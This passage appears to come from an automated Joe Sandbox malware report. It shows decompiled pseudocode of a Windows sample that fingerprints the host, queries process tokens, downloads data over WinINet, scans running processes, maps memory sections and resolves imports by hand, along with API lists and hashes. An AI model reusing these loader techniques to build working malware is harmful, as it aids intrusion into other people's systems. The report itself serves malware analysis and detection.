                            				_push(_t15 + 0x404054);
                            				_push(0x16);
                            				_push( &_v60);
                            				_v12 = _t31;
                            				L00401FF4();
                            				_t18 = _a4;
                            				if(_t18 == 0) {
                            					_t18 = 0x1000;
                            				}
                            				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
                            				_t34 = _t19;
                            				if(_t34 == 0) {
                            					_t32 = GetLastError();
                            				} else {
                            					if(_a4 != 0 || GetLastError() == 0xb7) {
                            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                            						if(_t22 == 0) {
                            							_t32 = GetLastError();
                            							if(_t32 != 0) {
                            								goto L9;
                            							}
                            						} else {
                            							 *_a8 = _t34;
                            							 *_a12 = _t22;
                            							_t32 = 0;
                            						}
                            					} else {
                            						_t32 = 2;
                            						L9:
                            						CloseHandle(_t34);
                            					}
                            				}
                            				return _t32;
                            			}
                            Instruction addresses of the decompiled lines above (source order, one per line of C code):
                            0x00401a49 0x00401a52 0x00401a56 0x00401a5c 0x00401a61 0x00401a66 0x00401a69 0x00401a6c 0x00401a71 0x00401a72
                            0x00401a75 0x00401a80 0x00401a87 0x00401a8b 0x00401a8d 0x00401a8e 0x00401a91 0x00401a96 0x00401aa0 0x00401aa2
                            0x00401aa2 0x00401ab6 0x00401abc 0x00401ac0 0x00401b10 0x00401ac2 0x00401acb 0x00401ae1 0x00401ae9 0x00401afb
                            0x00401aff 0x00000000 0x00000000 0x00401aeb 0x00401aee 0x00401af3 0x00401af5 0x00401af5 0x00401ad6 0x00401ad8
                            0x00401b01 0x00401b02 0x00401b02 0x00401acb 0x00401b18

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?,?), ref: 00401A56
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401A6C
                            • _snwprintf.NTDLL ref: 00401A91
                            • CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401AB6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401ACD
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401AE1
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401AF9
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A), ref: 00401B02
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401B0A
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1724014008-0
                            • Opcode ID: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
                            • Instruction ID: 1ca23827cf46cf4e4b48cd91b4d32e6437ca3dc37cb5e0f42cf8925e636595e9
                            • Opcode Fuzzy Hash: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
                            • Instruction Fuzzy Hash: 3B21A1B2600204BBDB11AFA8CD88E9F37BDEB48351F11403AF605F61E0D7B45945CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 96%
                            			E006D54EC(char __eax, void* __esi) {
                            				long _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v28;
                            				long _t34;
                            				signed int _t39;
                            				long _t50;
                            				char _t59;
                            				intOrPtr _t61;
                            				void* _t62;
                            				void* _t64;
                            				char _t65;
                            				intOrPtr* _t67;
                            				void* _t68;
                            				void* _t69;
                            
                            				_t69 = __esi;
                            				_t65 = __eax;
                            				_v8 = 0;
                            				_v12 = __eax;
                            				if(__eax == 0) {
                            					_t59 =  *0x6da310; // 0xd448b889
                            					_v12 = _t59;
                            				}
                            				_t64 = _t69;
                            				E006D3B9D( &_v12, _t64);
                            				if(_t65 != 0) {
                            					 *_t69 =  *_t69 ^  *0x6da344 ^ 0x46d76429;
                            				} else {
                            					GetUserNameW(0,  &_v8); // executed
                            					_t50 = _v8;
                            					if(_t50 != 0) {
                            						_t62 = RtlAllocateHeap( *0x6da2d8, 0, _t50 + _t50);
                            						if(_t62 != 0) {
                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                            								_t64 = _t62;
                            								 *_t69 =  *_t69 ^ E006D7194(_v8 + _v8, _t64);
                            							}
                            							HeapFree( *0x6da2d8, 0, _t62);
                            						}
                            					}
                            				}
                            				_t61 = __imp__;
                            				_v8 = _v8 & 0x00000000;
                            				GetComputerNameW(0,  &_v8);
                            				_t34 = _v8;
                            				if(_t34 != 0) {
                            					_t68 = RtlAllocateHeap( *0x6da2d8, 0, _t34 + _t34);
                            					if(_t68 != 0) {
                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                            							_t64 = _t68;
                            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E006D7194(_v8 + _v8, _t64);
                            						}
                            						HeapFree( *0x6da2d8, 0, _t68);
                            					}
                            				}
                            				asm("cpuid");
                            				_t67 =  &_v28;
                            				 *_t67 = 1;
                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                            				 *((intOrPtr*)(_t67 + 8)) = 0;
                            				 *(_t67 + 0xc) = _t64;
                            				_t39 = _v16 ^ _v20 ^ _v28;
                            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                            				return _t39;
                            			}

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 006D5523
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 006D553A
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 006D5547
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D5568
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 006D558F
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 006D55A3
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 006D55B0
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D55CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: 1435c22340b770d39092f14df54877f1b829c7fa4983ebcc7db0df678d61298f
                            • Instruction ID: a8de1e0426413f2d638a5013d013bab44556102d2c4662327eb34325f008a3cd
                            • Opcode Fuzzy Hash: 1435c22340b770d39092f14df54877f1b829c7fa4983ebcc7db0df678d61298f
                            • Instruction Fuzzy Hash: 8131F871E00605AFDB11DFA9DC81AAAB7FBAF58300F25446AE506D7220EB70DE019B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 38%
                            			E006D737C(char _a4, void* _a8) {
                            				void* _v8;
                            				void* _v12;
                            				char _v16;
                            				void* _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				void* _v44;
                            				void** _t33;
                            				void* _t40;
                            				void* _t43;
                            				void** _t44;
                            				intOrPtr* _t47;
                            				char _t48;
                            
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v20 = _a4;
                            				_t48 = 0;
                            				_v16 = 0;
                            				_a4 = 0;
                            				_v44 = 0x18;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v36 = 0;
                            				_v28 = 0;
                            				_v24 = 0;
                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                            					_t33 =  &_v8;
                            					__imp__(_v12, 8, _t33);
                            					if(_t33 >= 0) {
                            						_t47 = __imp__;
                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                            						_t44 = E006D7A71(_a4);
                            						if(_t44 != 0) {
                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                            							if(_t40 >= 0) {
                            								memcpy(_a8,  *_t44, 0x1c);
                            								_t48 = 1;
                            							}
                            							E006D789E(_t44);
                            						}
                            						NtClose(_v8); // executed
                            					}
                            					NtClose(_v12);
                            				}
                            				return _t48;
                            			}

                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 006D73C3
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 006D73D6
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 006D73F2
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 006D740F
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 006D741C
                            • NtClose.NTDLL(?), ref: 006D742E
                            • NtClose.NTDLL(00000000), ref: 006D7438
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: ebb56f34f2c9fc8cd0128f25f1cbce7e32c208df1dbd3492681a5e575886f6e7
                            • Instruction ID: b46e4f4ff80a4e80b70996f764be1ebf967e0d054d339ab623f957344cd16881
                            • Opcode Fuzzy Hash: ebb56f34f2c9fc8cd0128f25f1cbce7e32c208df1dbd3492681a5e575886f6e7
                            • Instruction Fuzzy Hash: BB211972D00218BBDB119FA5DC85ADEBFBEEF08740F10402AF905E6220E7719B44DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 71%
                            			E006D4F4B(void* __eax, void* __ecx) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				void _v20;
                            				void* __esi;
                            				void* _t30;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr* _t41;
                            				int _t45;
                            				long _t47;
                            				void* _t54;
                            				long _t64;
                            				void* _t67;
                            				void* _t69;
                            
                            				_t58 = __ecx;
                            				_t67 = __eax;
                            				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                            					L2:
                            					_t30 = _t67;
                            					_pop(_t68);
                            					_t69 = _t30;
                            					_t64 = 0;
                            					ResetEvent( *(_t69 + 0x1c));
                            					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                            						L9:
                            						if(_v8 == 0) {
                            							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                            						} else {
                            							 *0x6da174(0, 1,  &_v12); // executed
                            							if(0 != 0) {
                            								_t64 = 8;
                            							} else {
                            								_t38 = E006D7A71(0x1000);
                            								_v16 = _t38;
                            								if(_t38 == 0) {
                            									_t64 = 8;
                            								} else {
                            									_push(0);
                            									_push(_v8);
                            									_push( &_v20);
                            									while(1) {
                            										_t41 = _v12;
                            										_t61 =  *_t41;
                            										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                            										ResetEvent( *(_t69 + 0x1c));
                            										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                            										if(_t45 != 0) {
                            											goto L17;
                            										}
                            										_t64 = GetLastError();
                            										if(_t64 == 0x3e5) {
                            											_t64 = E006D2129( *(_t69 + 0x1c), _t61, 0xffffffff);
                            											if(_t64 == 0) {
                            												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                            												if(_t64 == 0) {
                            													goto L17;
                            												}
                            											}
                            										}
                            										L19:
                            										E006D789E(_v16);
                            										if(_t64 == 0) {
                            											_t47 = E006D45DF(_v12, _t69); // executed
                            											_t64 = _t47;
                            										}
                            										goto L22;
                            										L17:
                            										_t64 = 0;
                            										if(_v8 != 0) {
                            											_push(0);
                            											_push(_v8);
                            											_push(_v16);
                            											continue;
                            										}
                            										goto L19;
                            									}
                            								}
                            								L22:
                            								_t39 = _v12;
                            								 *((intOrPtr*)( *_t39 + 8))(_t39);
                            							}
                            						}
                            					} else {
                            						_t64 = GetLastError();
                            						if(_t64 != 0x3e5) {
                            							L8:
                            							if(_t64 == 0) {
                            								goto L9;
                            							}
                            						} else {
                            							_t64 = E006D2129( *(_t69 + 0x1c), _t58, 0xffffffff);
                            							if(_t64 == 0) {
                            								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                            								goto L8;
                            							}
                            						}
                            					}
                            					return _t64;
                            				} else {
                            					_t54 = E006D4E4D(__ecx, __eax);
                            					if(_t54 != 0) {
                            						return _t54;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,74CF81D0,00000000,00000000), ref: 006D762C
                            • InternetReadFile.WININET(?,?,00000004,?), ref: 006D763B
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?,?), ref: 006D7645
                            • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D76BE
                            • InternetReadFile.WININET(?,?,00001000,?), ref: 006D76CF
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?,?), ref: 006D76D9
                              • Part of subcall function 006D4E4D: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 006D4E64
                              • Part of subcall function 006D4E4D: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D4E74
                              • Part of subcall function 006D4E4D: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 006D4EA6
                              • Part of subcall function 006D4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4ECB
                              • Part of subcall function 006D4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4EEB
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                            • String ID:
                            • API String ID: 2393427839-0
                            • Opcode ID: fab5e0f5d04b20f46a22480baddc141c0c6987ff9d213b0384765b89d0c94740
                            • Instruction ID: 8c96399459189e5bd6199bef5d6d8445ebbaf0737c4aa401ef5943f7f622240b
                            • Opcode Fuzzy Hash: fab5e0f5d04b20f46a22480baddc141c0c6987ff9d213b0384765b89d0c94740
                            • Instruction Fuzzy Hash: 9541B436E04604ABCB219BA4DC44AAE77BBAF94360F24496BF511D7390FB30ED419B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E006D7256() {
                            				char _v264;
                            				void* _v300;
                            				void* _t5;
                            				int _t8;
                            				intOrPtr _t9;
                            				int _t15;
                            				void* _t17;
                            
                            				_t15 = 0;
                            				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                            				_t17 = _t5;
                            				if(_t17 != 0) {
                            					_t8 = Process32First(_t17,  &_v300);
                            					while(_t8 != 0) {
                            						_t9 =  *0x6da348; // 0xdcd5a8
                            						_t2 = _t9 + 0x6dbea8; // 0x73617661
                            						_push( &_v264);
                            						if( *0x6da12c() != 0) {
                            							_t15 = 1;
                            						} else {
                            							_t8 = Process32Next(_t17,  &_v300);
                            							continue;
                            						}
                            						L7:
                            						FindCloseChangeNotification(_t17); // executed
                            						goto L8;
                            					}
                            					goto L7;
                            				}
                            				L8:
                            				return _t15;
                            			}
                            Instruction addresses (one per statement line of the C-Code above, in listing order; 0x00000000 marks a line with no address): 0x006d7261, 0x006d7266, 0x006d726b, 0x006d726f, 0x006d7279, 0x006d72aa, 0x006d7280, 0x006d7285, 0x006d7292, 0x006d729b, 0x006d72b2, 0x006d729d, 0x006d72a5, 0x00000000, 0x006d72a5, 0x006d72b3, 0x006d72b4, 0x00000000, 0x006d72b4, 0x00000000, 0x006d72ae, 0x006d72ba, 0x006d72bf

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D7266
                            • Process32First.KERNEL32(00000000,?), ref: 006D7279
                            • Process32Next.KERNEL32(00000000,?), ref: 006D72A5
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006D72B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                            • String ID: R}m
                            • API String ID: 3243318325-971717010
                            • Opcode ID: da1246134d2af78201d62dfc2a227f24e1af7955acff893f29fc45b8097beb17
                            • Instruction ID: a1276f4fc03785d88aab022620b9f66cc1913acb53b7c851716fc9627dce416d
                            • Opcode Fuzzy Hash: da1246134d2af78201d62dfc2a227f24e1af7955acff893f29fc45b8097beb17
                            • Instruction Fuzzy Hash: 22F09632E051646BD761A6A69C09DEB776FDFC9350F000067F945C2344F6209B468AB6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00401D95(intOrPtr* __eax, void** _a4) {
                            				int _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				int _v28;
                            				int _v32;
                            				intOrPtr _v36;
                            				int _v40;
                            				int _v44;
                            				void* _v48;
                            				void* __esi;
                            				long _t34;
                            				void* _t39;
                            				void* _t47;
                            				intOrPtr* _t48;
                            
                            				_t48 = __eax;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v24 =  *((intOrPtr*)(__eax + 4));
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v48 = 0x18;
                            				_v44 = 0;
                            				_v36 = 0x40;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v28 = 0;
                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                            				if(_t34 < 0) {
                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                            				} else {
                            					 *_t48 = _v16;
                            					_t39 = E00401F78(_t48,  &_v12); // executed
                            					_t47 = _t39;
                            					if(_t47 != 0) {
                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                            					} else {
                            						memset(_v12, 0, _v24);
                            						 *_a4 = _v12;
                            					}
                            				}
                            				return _t47;
                            			}
                            Instruction addresses (one per statement line of the C-Code above, in listing order): 0x00401d9e, 0x00401da5, 0x00401da6, 0x00401da7, 0x00401da8, 0x00401da9, 0x00401dba, 0x00401dbe, 0x00401dd2, 0x00401dd5, 0x00401dd8, 0x00401ddf, 0x00401de2, 0x00401de9, 0x00401dec, 0x00401def, 0x00401df2, 0x00401df7, 0x00401e32, 0x00401df9, 0x00401dfc, 0x00401e02, 0x00401e07, 0x00401e0b, 0x00401e29, 0x00401e0d, 0x00401e14, 0x00401e22, 0x00401e22, 0x00401e0b, 0x00401e3a

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401DF2
                              • Part of subcall function 00401F78: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5
                            • memset.NTDLL ref: 00401E14
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID: @
                            • API String ID: 2533685722-2766056989
                            • Opcode ID: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
                            • Instruction ID: 51ff91b96694bad68c08ba82d5134d0fe6a1f199b3c348713c8e4c0aaae189fe
                            • Opcode Fuzzy Hash: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
                            • Instruction Fuzzy Hash: A8211DB5D00209AFCB11DFA9C8849DFFBB9EF48354F10443AE505F7260D7349A458BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040134F(void* __edi, intOrPtr _a4) {
                            				signed int _v8;
                            				intOrPtr* _v12;
                            				_Unknown_base(*)()** _v16;
                            				signed int _v20;
                            				signed short _v24;
                            				struct HINSTANCE__* _v28;
                            				intOrPtr _t43;
                            				intOrPtr* _t45;
                            				intOrPtr _t46;
                            				struct HINSTANCE__* _t47;
                            				intOrPtr* _t49;
                            				intOrPtr _t50;
                            				signed short _t51;
                            				_Unknown_base(*)()* _t53;
                            				CHAR* _t54;
                            				_Unknown_base(*)()* _t55;
                            				void* _t58;
                            				signed int _t59;
                            				_Unknown_base(*)()* _t60;
                            				intOrPtr _t61;
                            				intOrPtr _t65;
                            				signed int _t68;
                            				void* _t69;
                            				CHAR* _t71;
                            				signed short* _t73;
                            
                            				_t69 = __edi;
                            				_v20 = _v20 & 0x00000000;
                            				_t59 =  *0x403180;
                            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                            				if(_t43 != 0) {
                            					_t45 = _t43 + __edi;
                            					_v12 = _t45;
                            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                            					if(_t46 != 0) {
                            						while(1) {
                            							_t71 = _t46 + _t69;
                            							_t47 = LoadLibraryA(_t71); // executed
                            							_v28 = _t47;
                            							if(_t47 == 0) {
                            								break;
                            							}
                            							_v24 = _v24 & 0x00000000;
                            							 *_t71 = _t59 - 0x69b25f44;
                            							_t49 = _v12;
                            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                            							_t50 =  *_t49;
                            							if(_t50 != 0) {
                            								L6:
                            								_t73 = _t50 + _t69;
                            								_v16 = _t61 + _t69;
                            								while(1) {
                            									_t51 =  *_t73;
                            									if(_t51 == 0) {
                            										break;
                            									}
                            									if(__eflags < 0) {
                            										__eflags = _t51 - _t69;
                            										if(_t51 < _t69) {
                            											L12:
                            											_t21 =  &_v8;
                            											 *_t21 = _v8 & 0x00000000;
                            											__eflags =  *_t21;
                            											_v24 =  *_t73 & 0x0000ffff;
                            										} else {
                            											_t65 = _a4;
                            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                            												goto L12;
                            											} else {
                            												goto L11;
                            											}
                            										}
                            									} else {
                            										_t51 = _t51 + _t69;
                            										L11:
                            										_v8 = _t51;
                            									}
                            									_t53 = _v8;
                            									__eflags = _t53;
                            									if(_t53 == 0) {
                            										_t54 = _v24 & 0x0000ffff;
                            									} else {
                            										_t54 = _t53 + 2;
                            									}
                            									_t55 = GetProcAddress(_v28, _t54);
                            									__eflags = _t55;
                            									if(__eflags == 0) {
                            										_v20 = _t59 - 0x69b25ec5;
                            									} else {
                            										_t68 = _v8;
                            										__eflags = _t68;
                            										if(_t68 != 0) {
                            											 *_t68 = _t59 - 0x69b25f44;
                            										}
                            										 *_v16 = _t55;
                            										_t58 = 0x593682f4 + _t59 * 4;
                            										_t73 = _t73 + _t58;
                            										_t32 =  &_v16;
                            										 *_t32 = _v16 + _t58;
                            										__eflags =  *_t32;
                            										continue;
                            									}
                            									goto L23;
                            								}
                            							} else {
                            								_t50 = _t61;
                            								if(_t61 != 0) {
                            									goto L6;
                            								}
                            							}
                            							L23:
                            							_v12 = _v12 + 0x14;
                            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                            							if(_t46 != 0) {
                            								continue;
                            							} else {
                            							}
                            							L26:
                            							goto L27;
                            						}
                            						_t60 = _t59 + 0x964da13a;
                            						__eflags = _t60;
                            						_v20 = _t60;
                            						goto L26;
                            					}
                            				}
                            				L27:
                            				return _v20;
                            			}
                            Instruction addresses (one per statement line of the C-Code above, in listing order; 0x00000000 marks a line with no address): 0x0040134f, 0x00401358, 0x0040135d, 0x00401363, 0x0040136c, 0x00401372, 0x00401374, 0x00401377, 0x0040137c, 0x00401383, 0x00401383, 0x00401387, 0x0040138d, 0x00401392, 0x00000000, 0x00000000, 0x00401398, 0x004013a2, 0x004013a4, 0x004013a7, 0x004013aa, 0x004013ae, 0x004013b6, 0x004013b8, 0x004013bb, 0x00401423, 0x00401423, 0x00401427, 0x00000000, 0x00000000, 0x004013c0, 0x004013c6, 0x004013c8, 0x004013db, 0x004013de, 0x004013de, 0x004013de, 0x004013e2, 0x004013ca, 0x004013ca, 0x004013d2, 0x004013d4, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x004013d4, 0x004013c2, 0x004013c2, 0x004013d6, 0x004013d6, 0x004013d6, 0x004013e5, 0x004013e8, 0x004013ea, 0x004013f1, 0x004013ec, 0x004013ec, 0x004013ec, 0x004013f9, 0x004013ff, 0x00401401, 0x00401431, 0x00401403, 0x00401403, 0x00401406, 0x00401408, 0x00401410, 0x00401410, 0x00401415, 0x00401417, 0x0040141e, 0x00401420, 0x00401420, 0x00401420, 0x00000000, 0x00401420, 0x00000000, 0x00401401, 0x004013b0, 0x004013b0, 0x004013b4, 0x00000000, 0x00000000, 0x004013b4, 0x00401434, 0x00401434, 0x0040143b, 0x00401440, 0x00000000, 0x00000000, 0x00401446, 0x00401451, 0x00000000, 0x00401451, 0x00401448, 0x00401448, 0x0040144e, 0x00000000, 0x0040144e, 0x0040137c, 0x00401452, 0x00401457

                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
                            • GetProcAddress.KERNEL32(?,00000000), ref: 004013F9
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID:
                            • API String ID: 2574300362-0
                            • Opcode ID: 71bd3608c2aae27e145e5c381a93ddbc10b6f85558300da18975cc676a848597
